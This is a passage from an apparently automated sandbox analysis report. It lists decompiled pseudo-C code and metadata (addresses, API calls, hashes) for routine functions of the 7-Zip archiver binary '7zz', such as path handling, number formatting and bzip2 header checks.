						L00407A18( *((intOrPtr*)(_t158 - 0x58)));
						 *_t153 =  *(_t158 - 0x30);
						_push(_t158 - 0x40);
						_t83 = L0040B0A0(_t158 - 0x4c, _t158 - 0x34);
						 *(_t158 - 4) = 8;
						E00401E26(_t156, _t83);
						L00407A18( *((intOrPtr*)(_t158 - 0x4c)));
						L00407A18( *((intOrPtr*)(_t158 - 0x40)));
						L00407A18( *((intOrPtr*)(_t158 - 0x34)));
						L00407A18( *((intOrPtr*)(_t158 - 0x28)));
						goto L26;
					} else {
						L00407A18( *((intOrPtr*)(_t158 - 0x28)));
						goto L24;
					}
				} else {
					 *(_t158 - 0x18) = 0;
					if( *((intOrPtr*)(__edx + 8)) <= 0x104) {
						E00401E9A(__edx, 0x104);
					}
					_t92 =  *_t156;
					 *(_t158 - 0x1c) = _t92;
					 *(_t158 - 0x14) = GetFullPathNameW( *(_t158 - 0x10), 0x105, _t92, _t158 - 0x18);
					_t94 =  *_t156;
					_t133 = 0;
					if( *_t94 != 0) {
						_t149 = _t94;
						do {
							_t133 = _t133 + 1;
							_t149 =  &(_t149[1]);
						} while ( *_t149 != 0);
					}
					_t94[_t133] = 0;
					_t95 =  *(_t158 - 0x14);
					_t156[1] = _t133;
					if(_t95 == 0) {
						L24:
						_t89 = 0;
					} else {
						if(_t95 < 0x104) {
							L15:
							_t96 =  *(_t158 - 0x18);
							if(_t96 != 0) {
								_t97 = _t96 -  *(_t158 - 0x1c);
								__eflags = _t97;
								 *( *(_t158 + 8)) = _t97 >> 1;
							} else {
								_t100 =  *(_t158 - 0x10);
								_t136 = 0;
								while( *_t100 != 0) {
									_t136 = _t136 + 1;
									_t100 =  &(_t100[1]);
								}
								 *( *(_t158 + 8)) = _t136;
							}
							E0040A4A1( *(_t158 - 0x10), _t156, __eflags);
							L26:
							_t89 = 1;
						} else {
							_t103 = _t95 + 1;
							 *(_t158 - 0x14) = _t103;
							_t104 = _t103 + 1;
							if(_t103 + 1 >= _t156[2]) {
								E00401E9A(_t156, _t104);
							}
							_t105 =  *_t156;
							 *(_t158 - 0x1c) = _t105;
							_t106 = GetFullPathNameW( *(_t158 - 0x10),  *(_t158 - 0x14), _t105, _t158 - 0x18);
							_t138 =  *_t156;
							_t148 = 0;
							if( *_t138 != 0) {
								_t115 = _t138;
								do {
									_t148 = _t148 + 1;
									_t115 =  &(_t115[1]);
								} while ( *_t115 != 0);
							}
							_t138[_t148] = 0;
							_t156[1] = _t148;
							if(_t106 == 0 || _t106 >  *(_t158 - 0x14)) {
								goto L24;
							} else {
								goto L15;
							}
						}
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t158 - 0xc));
				return _t89;
			}



























                                                                                  0x0040a291
                                                                                  0x0040a29b
                                                                                  0x0040a2a0
                                                                                  0x0040a2a5
                                                                                  0x0040a2a8
                                                                                  0x0040a2b2
                                                                                  0x0040a3a0
                                                                                  0x0040a3a3
                                                                                  0x0040a3a6
                                                                                  0x0040a3a9
                                                                                  0x0040a3b4
                                                                                  0x0040a3b7
                                                                                  0x0040a3be
                                                                                  0x0040a3c7
                                                                                  0x0040a3cb
                                                                                  0x0040a3d7
                                                                                  0x0040a3d9
                                                                                  0x0040a3df
                                                                                  0x0040a3e4
                                                                                  0x0040a3e7
                                                                                  0x0040a402
                                                                                  0x0040a40c
                                                                                  0x0040a410
                                                                                  0x0040a418
                                                                                  0x0040a41c
                                                                                  0x0040a42b
                                                                                  0x0040a435
                                                                                  0x0040a439
                                                                                  0x0040a441
                                                                                  0x0040a445
                                                                                  0x0040a44e
                                                                                  0x0040a453
                                                                                  0x0040a45a
                                                                                  0x0040a462
                                                                                  0x0040a466
                                                                                  0x0040a46e
                                                                                  0x0040a476
                                                                                  0x0040a47e
                                                                                  0x0040a486
                                                                                  0x00000000
                                                                                  0x0040a3e9
                                                                                  0x0040a3ec
                                                                                  0x00000000
                                                                                  0x0040a3f1
                                                                                  0x0040a2b8
                                                                                  0x0040a2bd
                                                                                  0x0040a2c3
                                                                                  0x0040a2c8
                                                                                  0x0040a2c8
                                                                                  0x0040a2cd
                                                                                  0x0040a2d8
                                                                                  0x0040a2e7
                                                                                  0x0040a2ea
                                                                                  0x0040a2ec
                                                                                  0x0040a2f1
                                                                                  0x0040a2f3
                                                                                  0x0040a2f5
                                                                                  0x0040a2f5
                                                                                  0x0040a2f7
                                                                                  0x0040a2f8
                                                                                  0x0040a2f5
                                                                                  0x0040a2fd
                                                                                  0x0040a301
                                                                                  0x0040a306
                                                                                  0x0040a309
                                                                                  0x0040a3f2
                                                                                  0x0040a3f2
                                                                                  0x0040a30f
                                                                                  0x0040a314
                                                                                  0x0040a365
                                                                                  0x0040a365
                                                                                  0x0040a36a
                                                                                  0x0040a382
                                                                                  0x0040a382
                                                                                  0x0040a38a
                                                                                  0x0040a36c
                                                                                  0x0040a36c
                                                                                  0x0040a36f
                                                                                  0x0040a371
                                                                                  0x0040a376
                                                                                  0x0040a378
                                                                                  0x0040a378
                                                                                  0x0040a37e
                                                                                  0x0040a37e
                                                                                  0x0040a391
                                                                                  0x0040a48e
                                                                                  0x0040a48e
                                                                                  0x0040a316
                                                                                  0x0040a316
                                                                                  0x0040a317
                                                                                  0x0040a31a
                                                                                  0x0040a31e
                                                                                  0x0040a323
                                                                                  0x0040a323
                                                                                  0x0040a328
                                                                                  0x0040a332
                                                                                  0x0040a338
                                                                                  0x0040a33a
                                                                                  0x0040a33c
                                                                                  0x0040a341
                                                                                  0x0040a343
                                                                                  0x0040a345
                                                                                  0x0040a345
                                                                                  0x0040a347
                                                                                  0x0040a348
                                                                                  0x0040a345
                                                                                  0x0040a34d
                                                                                  0x0040a353
                                                                                  0x0040a356
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040a356
                                                                                  0x0040a314
                                                                                  0x0040a309
                                                                                  0x0040a496
                                                                                  0x0040a49e

                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 0040A291
                                                                                  • GetFullPathNameW.KERNEL32(?,00000105,00000104,00000002,00000000,59@,00000000), ref: 0040A2E5
                                                                                  • GetFullPathNameW.KERNEL32(?,?,00000001,00000002), ref: 0040A338
                                                                                    • Part of subcall function 004098A8: AreFileApisANSI.KERNEL32(?,?,?,0040AA48,00000003,?,?,?,?,?,?,?), ref: 004098B4
                                                                                    • Part of subcall function 0040B0A0: __EH_prolog.LIBCMT ref: 0040B0A5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: FullH_prologNamePath$ApisFile
                                                                                  • String ID: 59@
                                                                                  • API String ID: 1887739612-2780377667
                                                                                  • Opcode ID: e984556f7341f834eb6f76e66d3e67b41fabcb05650be67429daeab63fa82d0f
                                                                                  • Instruction ID: 0a5654e161e1f716a3f046905b73ad11417bb6cb1d0641c1b6b0c0ecaf941a14
                                                                                  • Opcode Fuzzy Hash: e984556f7341f834eb6f76e66d3e67b41fabcb05650be67429daeab63fa82d0f
                                                                                  • Instruction Fuzzy Hash: 53619A71E40209DFCB01EFA5C8419EEBBB5EF59304F10843EE452B7291DB785A518BAA
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 004060D4 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 126COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 100%
                                                                                  			E004060D4(void* __ecx) {
				unsigned int _v8;
				void* _v12;
				char _v43;
				char _v44;
				char _v160;
				void* _t50;
				void* _t53;
				unsigned int _t54;
				intOrPtr* _t55;
				intOrPtr _t60;
				int _t62;
				int _t69;
				void* _t72;
				signed int _t73;
				signed int _t79;
				unsigned int _t80;
				void _t81;
				char _t85;
				unsigned int _t86;
				signed int _t87;
				signed int _t92;
				signed int _t97;
				signed int _t98;
				void* _t103;
				void* _t104;
				unsigned int _t105;
				signed int _t106;
				void* _t107;
				void* _t108;
				signed int _t109;
				void* _t111;
				void* _t112;
				void* _t115;
				void* _t118;
				void* _t121;
				void* _t122;
				void* _t123;

				_t121 = __ecx;
				_t110 =  *(__ecx + 0x18);
				_t71 =  *(__ecx + 0x1c);
				if(( *(__ecx + 0x18) |  *(__ecx + 0x1c)) != 0) {
					_t50 = L0046B300(L0046B370( *((intOrPtr*)(__ecx + 0x10)),  *((intOrPtr*)(__ecx + 0x14)), 0x64, 0), _t103, _t110, _t71);
					_t111 = _t103;
				} else {
					_t50 = 0;
					_t111 = 0;
				}
				_t104 = 0xa;
				L004075FF( &_v44, _t104, _t50, _t111);
				_t53 = L0046B400( &_v44);
				 *((char*)(_t122 + _t53 - 0x28)) = 0x25;
				 *(_t122 + _t53 - 0x27) =  *(_t122 + _t53 - 0x27) & 0x00000000;
				_t54 = _t53 + 1;
				_v8 = _t54;
				_t105 = 4;
				if(_t54 > _t105) {
					_t105 = _t54;
				}
				_t79 =  *(_t121 + 0x20);
				_t106 = _t105 + 2;
				if(_t106 < _t79) {
					_t106 = _t79;
				}
				_t72 =  &_v160;
				_v12 = _t72;
				if( *(_t121 + 0x20) == 0) {
					if(_t106 > 0) {
						_t97 = _t106;
						_t118 =  &_v160;
						_t98 = _t97 >> 2;
						_t69 = memset(_t118, 0x20202020, _t98 << 2);
						_t72 = _t122 + _t106 - 0x9c;
						_v12 = _t72;
						memset(_t118 + _t98, _t69, (_t97 & 0x00000003) << 0);
						_t123 = _t123 + 0x18;
						_t54 = _v8;
					}
					 *(_t121 + 0x20) = _t106;
				}
				_t80 =  *(_t121 + 0x20);
				if(_t80 > 0) {
					_t115 = _t72;
					_t73 = _t80;
					_t92 = _t80 >> 2;
					memset(_t115 + _t92, memset(_t115, 0x8080808, _t92 << 2), (_t73 & 0x00000003) << 0);
					_t123 = _t123 + 0x18;
					_t72 = _v12 + _t73;
					_t54 = _v8;
				}
				 *(_t121 + 0x20) = _t106;
				if(_t54 < _t106) {
					_t109 = _t106 - _t54;
					_t86 = _t109;
					_t112 = _t72;
					_v8 = _t86;
					_t87 = _t86 >> 2;
					_t62 = memset(_t112, 0x20202020, _t87 << 2);
					_t72 = _t72 + _t109;
					memset(_t112 + _t87, _t62, (_t109 & 0x00000003) << 0);
				}
				_t81 = _v44;
				_t107 = _t72 + 1;
				 *_t72 = _t81;
				_t55 =  &_v43;
				if(_t81 != 0) {
					_t108 = _t107 -  &_v43;
					do {
						_t85 =  *_t55;
						 *((char*)(_t108 + _t55)) = _t85;
						_t55 = _t55 + 1;
					} while (_t85 != 0);
				}
				E00407CD5( *((intOrPtr*)(_t121 + 0x24)),  &_v160);
				L00407CAC( *((intOrPtr*)(_t121 + 0x24)));
				 *((intOrPtr*)(_t121 + 8)) =  *((intOrPtr*)(_t121 + 0x10));
				_t60 =  *((intOrPtr*)(_t121 + 0x14));
				 *((intOrPtr*)(_t121 + 0xc)) = _t60;
				return _t60;
			}








































                                                                                  0x004060df
                                                                                  0x004060e2
                                                                                  0x004060e5
                                                                                  0x004060ec
                                                                                  0x00406107
                                                                                  0x0040610c
                                                                                  0x004060ee
                                                                                  0x004060ee
                                                                                  0x004060f0
                                                                                  0x004060f0
                                                                                  0x00406113
                                                                                  0x00406116
                                                                                  0x0040611f
                                                                                  0x00406125
                                                                                  0x0040612a
                                                                                  0x0040612f
                                                                                  0x00406132
                                                                                  0x00406135
                                                                                  0x00406138
                                                                                  0x0040613a
                                                                                  0x0040613a
                                                                                  0x0040613c
                                                                                  0x0040613f
                                                                                  0x00406144
                                                                                  0x00406146
                                                                                  0x00406146
                                                                                  0x0040614c
                                                                                  0x00406152
                                                                                  0x00406155
                                                                                  0x00406159
                                                                                  0x0040615b
                                                                                  0x00406164
                                                                                  0x0040616a
                                                                                  0x0040616d
                                                                                  0x00406171
                                                                                  0x0040617b
                                                                                  0x0040617e
                                                                                  0x0040617e
                                                                                  0x00406180
                                                                                  0x00406180
                                                                                  0x00406183
                                                                                  0x00406183
                                                                                  0x00406186
                                                                                  0x0040618b
                                                                                  0x0040618d
                                                                                  0x0040618f
                                                                                  0x00406196
                                                                                  0x004061a0
                                                                                  0x004061a0
                                                                                  0x004061a7
                                                                                  0x004061a9
                                                                                  0x004061a9
                                                                                  0x004061ae
                                                                                  0x004061b1
                                                                                  0x004061b3
                                                                                  0x004061ba
                                                                                  0x004061bc
                                                                                  0x004061be
                                                                                  0x004061c1
                                                                                  0x004061c4
                                                                                  0x004061cb
                                                                                  0x004061cd
                                                                                  0x004061cd
                                                                                  0x004061cf
                                                                                  0x004061d2
                                                                                  0x004061d7
                                                                                  0x004061d9
                                                                                  0x004061dc
                                                                                  0x004061e1
                                                                                  0x004061e3
                                                                                  0x004061e3
                                                                                  0x004061e5
                                                                                  0x004061e8
                                                                                  0x004061e9
                                                                                  0x004061e3
                                                                                  0x004061f7
                                                                                  0x004061ff
                                                                                  0x00406208
                                                                                  0x0040620b
                                                                                  0x0040620e
                                                                                  0x00406214

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: __aulldiv
                                                                                  • String ID: $ $%
                                                                                  • API String ID: 3732870572-114112156
                                                                                  • Opcode ID: 5f3be3b97577a96593b7eed08c3f672e33e18b0ddb9a91ce93faccb85b3d0260
                                                                                  • Instruction ID: b857c6e470453704c1f0b52f1adfc20138d148c1cd609403c8723782e6e4065e
                                                                                  • Opcode Fuzzy Hash: 5f3be3b97577a96593b7eed08c3f672e33e18b0ddb9a91ce93faccb85b3d0260
                                                                                  • Instruction Fuzzy Hash: 5241B531B007089BDB24CE69D891AAAB7F6EF88304F14853ED546E7382EB34AD18C754
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0041CC41 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 95%
                                                                                  			E0041CC41() {
				void* _t29;
				void* _t35;
				intOrPtr* _t36;
				void* _t45;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr* _t49;
				void* _t51;
				void* _t53;

				L0046B890(E00475648, _t51);
				 *(_t51 - 4) =  *(_t51 - 4) & 0x00000000;
				_t49 =  *((intOrPtr*)(_t51 + 8));
				 *(_t51 - 4) = 1;
				 *((intOrPtr*)(_t51 - 0x10)) = _t53 - 0xc;
				 *((intOrPtr*)( *_t49 + 0x10))(_t49, _t45, _t48, _t35);
				_t46 =  *((intOrPtr*)(_t51 + 0xc));
				_t36 = _t49 + 0x28;
				_t29 =  *((intOrPtr*)( *_t46 + 0x10))(_t46, 0, 0, 1, _t36);
				_t56 = _t29;
				if(_t29 == 0) {
					_t29 = E0040FAC0(_t56, 3);
					if(_t29 == 0) {
						if( *((char*)(_t51 + 8)) != 0x42 ||  *((char*)(_t51 + 9)) != 0x5a ||  *((char*)(_t51 + 0xa)) != 0x68) {
							_t29 = 1;
						} else {
							_t29 =  *((intOrPtr*)( *_t46 + 0x10))(_t46, 0, 0, 2, _t51 - 0x18);
							if(_t29 == 0) {
								 *((char*)(_t49 + 0x30)) = 1;
								asm("sbb ecx, [ebx+0x4]");
								 *((intOrPtr*)(_t49 + 0x20)) =  *((intOrPtr*)(_t51 - 0x18)) -  *_t36;
								 *((intOrPtr*)(_t49 + 0x24)) =  *((intOrPtr*)(_t51 - 0x14));
								E0040C9B4(_t49 + 0x14, _t46);
								E0040C9B4(_t49 + 0x18, _t46);
								_t29 = 0;
							}
						}
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t51 - 0xc));
				return _t29;
			}












                                                                                  0x0041cc46
                                                                                  0x0041cc4e
                                                                                  0x0041cc54
                                                                                  0x0041cc58
                                                                                  0x0041cc5e
                                                                                  0x0041cc62
                                                                                  0x0041cc65
                                                                                  0x0041cc68
                                                                                  0x0041cc75
                                                                                  0x0041cc78
                                                                                  0x0041cc7a
                                                                                  0x0041cc83
                                                                                  0x0041cc8a
                                                                                  0x0041cc90
                                                                                  0x0041cce5
                                                                                  0x0041cc9e
                                                                                  0x0041ccab
                                                                                  0x0041ccb0
                                                                                  0x0041ccbb
                                                                                  0x0041ccbf
                                                                                  0x0041ccc2
                                                                                  0x0041ccc5
                                                                                  0x0041cccb
                                                                                  0x0041ccd4
                                                                                  0x0041ccd9
                                                                                  0x0041ccd9
                                                                                  0x0041ccb0
                                                                                  0x0041cc90
                                                                                  0x0041cc8a
                                                                                  0x0041ccf8
                                                                                  0x0041cd01

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID: B$Z$h
                                                                                  • API String ID: 3519838083-418080759
                                                                                  • Opcode ID: e27ca44641f6d3a39d7cf6b47e3b5a49e6ed396509ae319c0575fe9804f9460e
                                                                                  • Instruction ID: 95da72c9e758c624e4a23e77763632c46c0b47913da8fea83fca01b435c30606
                                                                                  • Opcode Fuzzy Hash: e27ca44641f6d3a39d7cf6b47e3b5a49e6ed396509ae319c0575fe9804f9460e
                                                                                  • Instruction Fuzzy Hash: 3621C771640604FFDB20CF24CC81BEE7BA4BF45B04F14451EF906AB281E3B4AA44C795
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00471F76 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • InterlockedIncrement.KERNEL32(00496224), ref: 00471F9C
                                                                                  • InterlockedDecrement.KERNEL32(00496224), ref: 00471FB1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: Interlocked$DecrementIncrement
                                                                                  • String ID: $bI
                                                                                  • API String ID: 2172605799-2563688255
                                                                                  • Opcode ID: 14794fd947a66a7e740a79147c95f718189372345e86d1cd971f01589f6869bf
                                                                                  • Instruction ID: f620e85f8d82dfbac1e457229ba36f5d0a3130eb6314d64e12aaba347fa3cd4d
                                                                                  • Opcode Fuzzy Hash: 14794fd947a66a7e740a79147c95f718189372345e86d1cd971f01589f6869bf
                                                                                  • Instruction Fuzzy Hash: 0BF0C232105242ABE720BFAEACC5DDB6795FB91719F10883FF008851A0D7689985951E
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00470DBD Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 16%
                                                                                  			E00470DBD(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t19;

				InterlockedIncrement(0x496224);
				_t19 =  *0x496220; // 0x0
				if(_t19 != 0) {
					InterlockedDecrement(0x496224);
					E0046E56A(0x13);
					_push(1);
					_pop(0);
				}
				_a8 = E00470E16(_a4, _a8);
				if(0 == 0) {
					InterlockedDecrement(0x496224);
				} else {
					L0046E5CB(0x13);
				}
				return _a8;
			}




                                                                                  0x00470dc9
                                                                                  0x00470dd7
                                                                                  0x00470ddd
                                                                                  0x00470de0
                                                                                  0x00470de4
                                                                                  0x00470dea
                                                                                  0x00470dec
                                                                                  0x00470dec
                                                                                  0x00470df9
                                                                                  0x00470dff
                                                                                  0x00470e0c
                                                                                  0x00470e01
                                                                                  0x00470e03
                                                                                  0x00470e08
                                                                                  0x00470e15

                                                                                  APIs
                                                                                  • InterlockedIncrement.KERNEL32(00496224), ref: 00470DC9
                                                                                  • InterlockedDecrement.KERNEL32(00496224), ref: 00470DE0
                                                                                    • Part of subcall function 0046E56A: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,0046FF49,00000009,00000000,00000000,00000001,0046E3A8,00000001,00000074,?,?,00000000,00000001), ref: 0046E5A7
                                                                                    • Part of subcall function 0046E56A: EnterCriticalSection.KERNEL32(?,?,?,0046FF49,00000009,00000000,00000000,00000001,0046E3A8,00000001,00000074,?,?,00000000,00000001), ref: 0046E5C2
                                                                                  • InterlockedDecrement.KERNEL32(00496224), ref: 00470E0C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: Interlocked$CriticalDecrementSection$EnterIncrementInitialize
                                                                                  • String ID: $bI
                                                                                  • API String ID: 2038102319-2563688255
                                                                                  • Opcode ID: efb15d606f5e44fd71a55acc674efbc2999dbd389be6925d70f36fac0792ac87
                                                                                  • Instruction ID: a29c1fd973d67cf1eab9a1632a1b120ecfaf970aee40f0b8d32a81a5239f5549
                                                                                  • Opcode Fuzzy Hash: efb15d606f5e44fd71a55acc674efbc2999dbd389be6925d70f36fac0792ac87
                                                                                  • Instruction Fuzzy Hash: AAF0B436102119FEEB102B96AC419CF7798EF44728F11843FF508491519B745A818999
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00458600 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 58%
                                                                                  			E00458600() {
				signed int _t4;

				_t4 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "GetLargePageMinimum");
				if(_t4 != 0) {
					_t4 =  *_t4();
					if(_t4 != 0) {
						_t1 = _t4 - 1; // -1
						if((_t4 & _t1) == 0) {
							 *0x491560 = _t4;
							return _t4;
						}
					}
				}
				return _t4;
			}




                                                                                  0x00458611
                                                                                  0x00458619
                                                                                  0x0045861b
                                                                                  0x0045861f
                                                                                  0x00458621
                                                                                  0x00458626
                                                                                  0x00458628
                                                                                  0x00000000
                                                                                  0x00458628
                                                                                  0x00458626
                                                                                  0x0045861f
                                                                                  0x0045862d

                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,GetLargePageMinimum,00403B70,?,?,00000000,00000001,00000000), ref: 0045860A
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00458611
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressHandleModuleProc
                                                                                  • String ID: GetLargePageMinimum$kernel32.dll
                                                                                  • API String ID: 1646373207-2515562745
                                                                                  • Opcode ID: e945a4318dcfde84d8dda7067848fc9038098bba741c81babacb23e338e356e1
                                                                                  • Instruction ID: 187617de4669a97dd730b08bbbb79d285659c800799f683955411e203a0e4393
                                                                                  • Opcode Fuzzy Hash: e945a4318dcfde84d8dda7067848fc9038098bba741c81babacb23e338e356e1
                                                                                  • Instruction Fuzzy Hash: C4D0C7F0741316569B145BB15C4C77F3654AB94743B4444BF6806D1191EF29D504CB1D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0046C94A Relevance: 6.5, APIs: 5, Instructions: 278COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 68%
                                                                                  			E0046C94A(void* _a4, long _a8) {
				signed int _v8;
				intOrPtr _v20;
				long _v36;
				void* _v40;
				intOrPtr _v44;
				char _v48;
				long _v52;
